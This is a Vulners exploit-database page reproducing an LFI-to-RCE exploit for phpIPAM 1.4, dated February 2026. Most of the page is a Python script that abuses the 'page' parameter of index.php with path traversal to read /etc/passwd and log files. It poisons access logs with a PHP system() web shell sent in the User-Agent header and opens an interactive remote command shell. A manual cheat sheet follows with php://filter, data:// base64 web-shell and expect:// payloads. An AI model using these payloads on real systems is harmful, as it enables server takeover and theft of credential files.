Vulners
Lucene search
📄 phpIPAM 1.4 Code Execution / Local File Inclusion
phpIPAM 1.4 LFI to RCE Exploit
=============================================================================================================================================
| # Title : phpIPAM 1.4 LFI to RCE Exploit
|
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2
(64 bits) |
| # Vendor : https://github.com/phpipam/phpipam/blob/master/index.php
|
=============================================================================================================================================
[+] Summary : A critical Local File Inclusion (LFI) vulnerability exists
in phpIPAM's main index.php file due to insufficient input validation
when including page files. Attackers can exploit this to
read sensitive system files, potentially escalate to Remote Code Execution
(RCE),
and gain complete control of the server.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
phpIPAM LFI to RCE Exploit
"""
import requests
import sys
import urllib.parse
class phpIPAM_Exploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
def check_lfi(self, path):
"""اختبار تضمين الملفات"""
params = {'page': path}
response = self.session.get(f"{self.target}/index.php",
params=params)
return response
def exploit_proc_self_environ(self):
"""استغلال /proc/self/environ"""
print("[*] Testing /proc/self/environ LFI...")
# أولاً: حقن PHP في User-Agent
headers = {
'User-Agent': '<?php system($_GET["cmd"]); ?>'
}
response = self.session.get(self.target, headers=headers)
# ثانياً: تضمين ملف السجل
log_paths = [
'/var/log/apache2/access.log',
'/var/log/httpd/access_log',
'/var/log/nginx/access.log',
'/proc/self/environ',
'/proc/self/fd/0'
]
for path in log_paths:
print(f"[*] Trying {path}...")
response = self.check_lfi(f"../../../../{path}")
if 'PHP' in response.text or 'php' in response.text:
print(f"[+] Possible LFI found: {path}")
# اختبار تنفيذ الأوامر
cmd_response = self.session.get(
f"{self.target}/index.php",
params={'page': f'../../../../{path}', 'cmd':
'whoami'}
)
if cmd_response.status_code == 200:
print("[+] RCE successful!")
return True
return False
def upload_and_include(self, php_code):
"""رفع وتضمين ملف مؤقت (إذا كان هناك رفع ملفات)"""
# هذا يتطلب ثغرة رفع ملفات أيضًا
print("[*] Trying to upload and include PHP file...")
# PHP shell base64 encoded
shell = "<?php echo
base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='); ?>"
# محاولة تضمين ملفات /tmp
tmp_files = [
'/tmp/sess_*',
'/tmp/php*',
'/tmp/upload*'
]
for pattern in tmp_files:
for i in range(100):
filename = pattern.replace('*', str(i))
response = self.check_lfi(f"../../../../{filename}")
if 'uid=' in response.text or 'root' in
response.text.lower():
print(f"[+] Found vulnerable temp file: {filename}")
return filename
return None
def interactive_shell(self, lfi_path):
"""قشرة تفاعلية بعد الاستغلال"""
print(f"\n[+] Interactive shell via LFI: {lfi_path}")
print("[+] Type 'exit' to quit\n")
while True:
cmd = input("shell").strip()
if cmd.lower() == 'exit':
break
params = {
'page': f'../../../../{lfi_path}',
'cmd': cmd
}
response = self.session.get(f"{self.target}/index.php",
params=params)
# استخراج الناتج
lines = response.text.split('\n')
for line in lines:
if line and not line.startswith(('<', '<?', '<!')) and
'html' not in line.lower():
print(line[:500]) # طباعة أول 500 حرف
def run(self):
"""تشغيل الاستغلال"""
print("[*] phpIPAM LFI/RFI Exploit")
print(f"[*] Target: {self.target}")
# اختبار LFI أساسي
test_files = [
'../../../../etc/passwd',
'../../../../etc/hosts',
'../../../../windows/win.ini',
'....//....//....//....//etc/passwd',
'..\\..\\..\\..\\windows\\win.ini'
]
for test in test_files:
print(f"[*] Testing: {test}")
response = self.check_lfi(test)
if 'root:' in response.text or '[extensions]' in
response.text:
print(f"[+] LFI confirmed with: {test}")
print(f"[+] Response preview: {response.text[:200]}")
# استغلال مباشر
self.interactive_shell(test.replace('../../../../', ''))
return True
# محاولات أخرى
if self.exploit_proc_self_environ():
return True
print("[-] No LFI vulnerability found")
return False
# استغلال يدوي
def manual_exploitation():
print("""
=== phpIPAM LFI/RFI Manual Exploitation ===
1. Basic LFI Test:
/index.php?page=../../../../etc/passwd
/index.php?page=../../../../etc/shadow
/index.php?page=../../../../windows/win.ini
2. Log Poisoning:
# Step 1: Inject PHP into logs
GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include the log file
/index.php?page=../../../../var/log/apache2/access.log&cmd=id
3. PHP Filters (if enabled):
/index.php?page=php://filter/convert.base64-encode/resource=config.php
/index.php?page=php://filter/resource=/etc/passwd
4. Data URI (if allow_url_include=On):
/index.php?page=data://text/plain,<?php phpinfo();?>
/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
5. Expect Wrapper (rare):
/index.php?page=expect://ls
""")
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 phpipam_exploit.py <target_url>")
print("Example: python3 phpipam_exploit.py
http://localhost/phpipam")
manual_exploitation()
sys.exit(1)
target = sys.argv[1]
exploit = phpIPAM_Exploit(target)
exploit.run()
Greetings to
:=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln
(John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2026 00:00Current
6.2Medium risk
Vulners AI Score6.2